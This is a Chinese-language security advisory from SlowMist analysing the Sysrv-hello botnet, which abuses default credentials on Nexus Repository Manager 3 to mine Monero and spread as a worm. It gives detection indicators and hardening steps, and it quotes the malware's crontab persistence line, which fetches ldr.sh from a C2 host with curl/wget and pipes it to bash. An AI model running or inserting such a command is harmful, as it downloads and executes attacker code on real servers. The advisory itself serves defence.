慢雾：技术拆解 Sysrv-hello 僵尸网络入侵原理

攻击路径

Sysrv-hello 僵尸网络对云上 Nexus Repository Manager 3 存在默认帐号密码的服务器进行攻击，Maven 私服部署会用到 Nexus Repository Manager 3，由于 Maven 是个流行服务，所以也给了 Sysrv-hello 僵尸网络的大范围感染机会。

当 Nexus Repository Manager 3 服务对外网开放且存在默认账号密码时，Sysrv-hello 就可以直接扫描入侵，利用 Nexus Repository Manager 3 的 Tasks 功能模块直接运行恶意脚本达到入侵服务器的目的。

入侵到服务器后会自动下载执行 ldr.sh 文件，该文件主要功能：
1. 禁用 Linux 服务器防火墙 (ufw) 及清空 iptables
2. 删除 aliyun、yunjing 等主机安全软件
3. 禁用 apparmor、selinux、watchdog 等安全机制
4. 删除其他竞品
5. 下载门罗币挖矿程序进行挖矿，文件与进程名为 network01
6. 下载第二个木马 sysrv 进行更高级操作
7. 在 crontab 里加上尾巴

第二个木马 sysrv 的主要功能：
1. 确保门罗币挖矿程序 network01 正常运行
2. 进行蠕虫传播，随机扫描其他 IP 服务，同样进行 Nexus Repository Manager 3 漏洞利用，同时也会尝试入侵 MySQL、Tomcat、WebLogic 等服务

自查方法

进程：
network01
sysrv

文件：
/tmp/network01
/tmp/sysrv
/tmp/flag.txt

crontab：
echo "*/9 * * * * (curl -fsSL $cc/ldr.sh || wget -q -O - $cc/ldr.sh) | bash > /dev/null 2>&1" | crontab -

端口：
52013

存在以上这些，停止 备份样本后删除。

加固建议

1. 删除 Nexus Repository Manager 3 Tasks 里的恶意代码
2. Nexus Repository Manager 3 严禁外网访问，严禁默认账号密码
3. Nexus Repository Manager 3 升级为最新版本
4. 被入侵服务器备份重要数据后，重配置（恢复 ldr.sh 禁用或删除的安全机制）或重做
5. 检查被入侵服务器是否存在直接访问生产网其他服务的能力，存在则在生产网其他服务所在的服务器上进一步分析是否有异常

免责声明：作为区块链信息平台，本站所发布文章仅代表作者个人观点，与链闻 ChainNews 立场无关。文章内的信息、意见等均仅供参考，并非作为或被视为实际投资建议。